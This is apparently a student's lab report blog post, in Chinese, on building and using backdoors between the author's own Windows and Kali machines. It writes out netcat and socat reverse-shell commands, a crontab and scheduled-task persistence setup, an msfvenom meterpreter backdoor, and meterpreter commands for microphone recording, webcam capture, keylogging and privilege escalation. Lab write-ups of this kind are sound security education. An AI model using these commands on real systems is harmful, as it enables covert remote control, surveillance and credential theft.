Exp2-后门原理与实践 20181223何家豪

实验内容

准备工作

在cmd中获得Windows的IP地址:192.168.3.125

在终端模拟器中获得kali的IP地址,需要先使用命令export PATH=/usr/sbin/:$PATH转到ifconfig所在目录为/usr/sbin下,再使用ifconfig获得IP地址:192.168.3.180

一、使用netcat获取主机操作Shell,cron启动

1. Windows获得Linux shell

打开cmd,跳转至ncat工具所在目录之中,并输入指令ncat.exe -l -p 1223 ,通过ncat工具监测1223端口

然后进入Linux终端输入nc 192.168.3.125 1223 -e /bin/sh,反弹连接Windows

windows获得kali中linux的shell,验证后,以ls为例,反弹连接成功

2. Linux获得window Shell

在kali终端中输入nc -l -p 1223

然后在Windows里反弹连接Linuxncat.exe -e cmd.exe 192.168.3.180 1223

Linux下看到Windows的命令提示,成功获得Windows的shell

3. 通过crontab命令,定时启动任务

在Windows下输入ncat.exe -l -p 1223打开监听
然后在Linux里输入crontab -e添加定时启动任务

进入vim编辑器中,在最后一行添加定时任务指令,3 * * * * /bin/netcat 192.168.3.125 1223 -e /bin/sh,保存退出

3分钟后,获得权限

二、使用socat获取主机操作Shell, 任务计划启动

在Windows里打开任务计划程序
新建任务。命名为20181223

设置触发器为工作站锁定时

新建操作为打开socat.exe,添加参数tcp-listen:1223 exec:cmd.exe,pty,stderr,保存

win+L锁定后,弹窗警告,点击确定

在Linux中输入socat - tcp:192.168.3.125:1223,成功获得Windows的shell

三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

在Linux中输入以下指令以生成后门文件msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.180 LPORT=1223 -f exe > 20181223_backdoor.exe

在Windows下输入ncat.exe -l 1223 > 20181223_backdoor.exe,准备接收后门文件

在Linux下输入nc 192.168.3.125 1223 < 20181223_backdoor.exe

Windows下的资源管理器中查看传送过来的文件

在Linux下输入msfconsole,进入控制台

输入use exploit/multi/handler,进入监听模式
输入set payload windows/meterpreter/reverse_tcp设置载荷,基于TCP的反向连接反弹windows shell
输入set LHOST 192.168.3.125,设置主机ip
输入set LPORT 1223设置本机端口

输入exploit,开始监听

启动之前的后台程序,成功得到shell

四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

输入record_mic截获一段音频,输入webcam_snap调用摄像头拍照

调用摄像头时火绒给我拦截了,然后我没办法修改火绒的规则,所以这一步失败。。。下次记得千万别安装杀毒软件

输入keyscan_start截取主机中的击键记录,输入keyscan_dump停止并显示击键记录

输入getsystem提权

五、基础问题回答

1. 例举你能想到的一个后门进入到你系统中的可能方式?

浏览网页时,不小心下载了恶意软件,如果再不小心打开它,恶意程序就会通过后门进入你的系统。

2. 例举你知道的后门如何启动起来(win及linux)的方式?

可以通过伪装成正常软件诱导用户点击来启动,或者恶意软件可以隐藏在图片或者Word里面,当用户打开文件后恶意程序就会启动。

3. Meterpreter有哪些给你映像深刻的功能?

记录键盘的功能,这样会使得你的任何强力密码都能形同虚设。摄像头我已经通过物理手段隔绝了(贴胶带)。

4. 如何发现自己有系统有没有被安装后门?

可以使用杀毒软件来扫描计算机内部,看看有没有被入侵。或者可以使用nestat -na查看开放端口,往往大的端口被打开时就要小心了。

六、实验总结与体会

通过本次实验,我对计算机系统内部安全的认识又提高了。特别是对于恶意软件的危害。如果不小心让恶意软件获得了很高的权限,这是很危险的事。不过,最重要的是,我们应该提升自己的安全意识,不要点击下载未知来源的软件,不要给未知软件不必要的权限。

posted @ 2021-03-27 23:20  POI~20181223  阅读(103)  评论(0编辑  收藏  举报